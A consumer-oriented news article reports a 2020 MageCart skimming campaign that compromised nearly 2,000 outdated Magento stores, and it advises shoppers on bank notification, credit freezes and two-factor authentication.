Cyberattacks on e-commerce websites are becoming more common each year. Some of them involved direct hacks of their victims, while others involve rigging websites to steal credit card details and personal data when shoppers type them. Tap or click here for a rundown on some of last year’s biggest eCommerce hacks. And now, one of the biggest e-commerce hacks since 2015 has targeted a system that thousands of online stores rely on: Magento. Thanks to an issue with an outdated version, almost 2,000 stores were altered to steal credit card info from customers. Here’s how we think it happened, and what you can do to stay safe.

The ultimate MageCart attack?

A new report by researchers at Sanguine Security showed nearly 2,000 separate online stores were compromised in what it’s calling the largest automated MageCart campaign ever. For those who don’t know, a MageCart attack involves compromising an online store so the check-out page will steal data typed in by customers — especially credit card details. Tap or click here for more details on how this cyberattack pattern works. These websites all had one thing in common: A back-end system controlled by Magento, a powerful e-commerce platform owned by Adobe. The majority of the hacked sites were using an outdated model of Magento that lacked some of the security features included in the latest version. These flaws were exploited by hackers to carry out the attacks. From September 11 through 14, 2020, Sanguine Security detected 1,904 Magento stores targeted by cyberattacks. These websites had malicious code injected into their check-out pages that would steal customer data and send it back to a URL controlled by hackers. Although we don’t fully know what exploit the hackers used to attack victims, posts on a Dark Web forum dating back to August showed several Magento exploits on sale for upwards of $5,000. The sale was made to a grand total of 10 people, which may explain how these hackers were able to pull off such a coordinated effort. Because Magento version 1 is considered an end-of-life product, this means there is no official support or patch. Merchants who rely on Magento should use this incident to switch to more secure options like Magento 2, which features more robust security.

I was shopping online over the weekend. Am I in trouble?

While there isn’t a public-facing list of every store affected by the hack, law enforcement does have access to names of the stores obtained by Sanguine Security. If you were affected by the hacks, expect a site owner to reach out to you about your status. If you’re told that your data was leaked, take a moment to call your bank or credit card provider and let them know your information was compromised. That way, they’ll be able to stop any fraudulent charges that come in. You may also want to speak to a credit bureau and discuss a freeze on your credit for peace of mind. Tap or click here to see how to set up a credit freeze. To protect yourself from MageCart attacks going forward, you must be vigilant and cautious. One of the things that makes these attacks so scary is they’re totally invisible unless you know code. But if you keep these factors in mind, you will be much safer: In addition to these steps, the usual advice of strong passwords and two-factor authentication applies here. By forcing hackers to take an extra step to log in, you give yourself a chance to catch them in the act. Tap or click to set up two-factor authentication for the most popular platforms on the web.